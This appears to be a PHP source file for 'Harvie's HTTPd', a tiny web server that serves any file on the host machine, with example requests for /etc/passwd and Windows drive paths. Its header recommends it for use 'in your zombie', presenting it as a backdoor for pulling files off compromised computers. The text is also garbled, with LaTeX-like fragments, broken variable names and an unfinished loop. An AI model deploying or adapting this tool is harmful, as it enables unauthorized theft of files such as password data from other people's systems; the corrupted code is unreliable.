```
#!usr/bin/php
<?php
//Harvie's HTTPd 0.5
 Allows you to binary safe download any file from remote pc
  http://server:port/file
  http://server:port//etc/passwd
  http://server:port/C:\dir\file
  http://server:port/C:/dir/file
 You can also play multimedia like streams (using XMMS, Winamp, etc...)
 But this can serve only one file a time
  (if you are streaming or downloading, you can download/browse anything other,
  but you can use download manager to download file by file...)
 You can change port or interface by passing arguments
 Usage: (httpd.php [port] [interface IP])
 This is very nice utility to use in your zombie.
\frac{127.0.0.1}{}
port = 8080;
$index = "index.html";
$okheader = //Header 200
 "HTTP/1.0 200 OK\n".
 "Server: Harvie's HTTPd\n".
 "Connection: close\n\n";
$badheader = //Header 404
 "HTTP/1.0 404 File not found!\n".
 "Server: Harvie's HTTPd\n".
 "Connection: close\n\n";
$err404 = "ERR 404 - NOT FOUND!"; //Error 404
if(isset($argc)) {
 if(\frac{sargc > 1)}{port = trim(\frac{sargv[1]}{r})};
if($argc > 2) $interface = trim($argv[2]);
}
echo("\n\tStarting Harvie's HTTPd at:\n\ttcp://$interface:$port\n\n");
//system("title Harvie's HTTPd at tcp://$interface:$port"); //Microsoft Windows only
set_time_limit(0);
$sss = stream_socket_server("tcp://$interface:$port");
while(1) {
 @$sfp = stream_socket_accept($sss);
 if(!$sfp) continue;
 sloop = 1:
 while($sfp && !@feof($sfp) && $loop) {
```

```
$line = fgets($sfp);
  //echo($line);
  if(eregi("(GET|POST)", $line)) {
   $line = trim($line);
   //echo($line);
   $line = explode(" ", $line);
   $line[1] = urldecode($line[1]);
   if($line[1] == "/") {
    $line[1] = $index;
   } else {
     $line[1] = substr($line[1], 1);
   }
   if(is_file($line[1])) { //200 OK
    fwrite($sfp, $okheader);
     echo("200 ".$line[1]."\n");
     $fp = fopen($line[1], "rb");
     while( fwrite($sfp, fgets($fp)) );
     @fclose($sfp);
   } else { //404 NOT FOUND
     echo("404 ".$line[1]."\n");
     fwrite($sfp, $badheader);
    fwrite($sfp, $err404);
     @fclose($sfp);
   }
   sop = 0;
  }
 @fclose($sfp);
?>
```